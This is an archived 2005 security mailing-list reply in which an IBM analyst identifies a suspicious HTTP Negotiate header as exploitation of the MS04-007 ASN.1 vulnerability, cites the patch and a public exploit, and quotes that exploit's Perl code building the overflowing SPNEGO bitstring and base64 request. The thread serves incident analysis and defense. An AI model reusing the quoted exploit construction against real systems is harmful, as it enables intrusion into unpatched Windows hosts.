Re: New http attack?

From: Jason Falciola (falciola_at_us.ibm.com)
Date: 06/08/05

  • Next message: Jason Falciola: "RE: New http attack? (sdbot/rbot/other)"
    To: "Keith T. Morgan" <keith.morgan@terradon.com>
    Date: Wed, 8 Jun 2005 16:08:14 -0400
    
    

    On Wednesday, June 08, 2005 1:32 PM, "Keith T. Morgan"
    keith.morgan@terradon.com wrote:

    ] We've seen an attack that triggered a snort bleeding-edge hit for "smb
    ] over http authentication." This isn't particularly alarming, but, what
    ] caught my attention is what appears to be a very large buffer in part of
    ] the packet.

    ] The ascii decoded capture looks a bit like this:

    ] GET / HTTP/1.0
    ] Host: obfuscated
    ] Authorization: Negotiate <what may be an encrypted password>
    ] QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB.

    ] This "QUFB" string is repeated for 1400 bytes or so, and I'm assuming
    ] went beyond the single packet capture I have.

    ] The IIS logs indicate a simple GET / with a 401 response code.

    ] Has anyone seen this "QUFBQUFB" string in a worm, virus, or exploit
    ] floating around out there somewhere? I think chances of this being a FP
    ] are low since we're not using NTLM or windows native/ad authentication
    ] on this site.

    Keith,

    This is due to exploitation of a vulnerability [1] in Microsoft's ASN.1
    implementation. This issue is patched in MS04-007 [2], which also fixed
    another vulnerability reported by eEye [3].

    We recently notified our clients after observing a surge in this activity
    over the past several weeks, often from .edu sources. This which may be
    related to the fact that a reliable (on Windows 2000 <= SP4 and XP <= SP1)
    and easy to use exploit is available from Solar Eclipse [4] and has
    recently been ported over to the Metasploit framework. [5] [6] Our lab
    testing confirms that the Solar Eclipse exploit generates packets that
    match what we're seeing in the wild.

    A large amount of the traffic we observe attempting to exploit this
    vulnerability is on port 80, although ports 139 and 445 are also exploit
    vectors. Attacks on these ports have all been observed in conjunction with
    rbot and sdbot variants. Keep in mind that port 25 (Exchange) and UDP 88
    (Kerberos) are also potential avenues of attack.

    I've included a snippet of the relevant code [7] from the exploit by Solar
    Eclipse [4]. As dullien@gmx.de mentioned, the base64 encoding is
    responsible for the string of 'AAA's (commonly used to overflow a buffer)
    being seen as 'QUFB'.

    [1] <http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0818>
    [2] <http://www.microsoft.com/technet/security/bulletin/MS04-007.mspx>
    [3] <http://www.eeye.com/html/Research/Advisories/AD20040210.html>
    [4] <http://www.phreedom.org/solar/exploits/msasn1-bitstring/> - a dir
    listing from the parent directory shows this as last modified in late April
    2005
    [5]
    <http://metasploit.com/projects/Framework/modules/exploits/msasn1_ms04_007_killbill.pm>
     - ported from [4]
    [6]
    <http://metasploit.com:55555/EXPLOITS?MODULE=msasn1_ms04_007_killbill&MODE=PAYLOAD&OPT_TARGET=0>

    [7] From <http://www.phreedom.org/solar/exploits/msasn1-bitstring/>

    <snip>
    Constructing the exploit

    $bitstring =
        constr(
            bits("a"x1040),
            "\x03\x00",
            constr(
                bits("B"x1033),
                constr(
                    bits($fw, $bk)
                ),
                constr(
                    bits("C"x1040),
                    constr(
                        bits("\xeb\06\x90\x90\x90\x90\x90\x90"),
                        bits("D"x1040),
                    )
                )
            )
        );

    $spnego =
        "\x60" . asn1( # Application Constructed Object
            "\x06\x06\x2b\x06\x01\x05\x05\x02" . # SPNEGO OID
            "\xa0" . asn1( # NegTokenInit (0xa0)
                "\x30" . asn1( # Constructed Sequence
                    "\xA1" . asn1( # ContextFlags (0xa1)
                        $bitstring
                    )
                )
            )
        );

    $request =
        "GET / HTTP/1.1\r\n" .
        "Authorization: Negotiate " . encode_base64($spnego, "") . "\r\n" .
    [$spnego is the result of the above concatenations, which are then encoded
    using base64]
        "\r\n";
    <snip>

    Jason Falciola
    Security Intelligence Analyst
    IBM Managed Security Services
    falciola@us.ibm.com


  • Next message: Jason Falciola: "RE: New http attack? (sdbot/rbot/other)"

    Relevant Pages

    • RE: Strange loopback in firefox.
      ... described as heavy attack from outside IP addresses. ... either using the Microsoft_DS port or epmap port to connect). ... For example a connection from port 3014 to 3015 and the next ... to facilitate one-on-one interaction with one of our expert instructors. ...
      (Security-Basics)
    • Re: Security problem
      ... simply to use a non-standard port. ... names and passwords, on large ranges of IP addresses. ... order to perform successful brute-force attack and that's ludicrous. ... DROP incoming packets for other ports (and what internet-facing server ...
      (comp.os.linux.development.apps)
    • FW: Legal? Road Runner proactive scanning.[Scanned]
      ... You consider a port scan to be an attack? ... to facilitate one-on-one interaction with one of our expert instructors. ... Attend a course taught by an expert instructor with years of in-the-field ...
      (Security-Basics)
    • Re: SSH server under attack...
      ... It's highly possible that even though you changed the port, an automated script discovered the new port by probing the ports and matching version numbers, ie: ... the new machine to attack me is 200.55.192.29. ... Failed password for invalid user admin from::ffff:200.55.192.29 port ...
      (Security-Basics)
    • SSH server under attack...
      ... OK...within a few hours the server was being attacked again on port 2222. ... The router/firewall logs dont show any dropped packets sent to port 22 so he changed the port of the attack script. ... I scanned the machine and found that it is hosting a webserver Server at www.springs.cl) among other services. ... Invalid user admin from::ffff:200.55.192.29 Failed password for invalid user admin from::ffff:200.55.192.29 port ...
      (Security-Basics)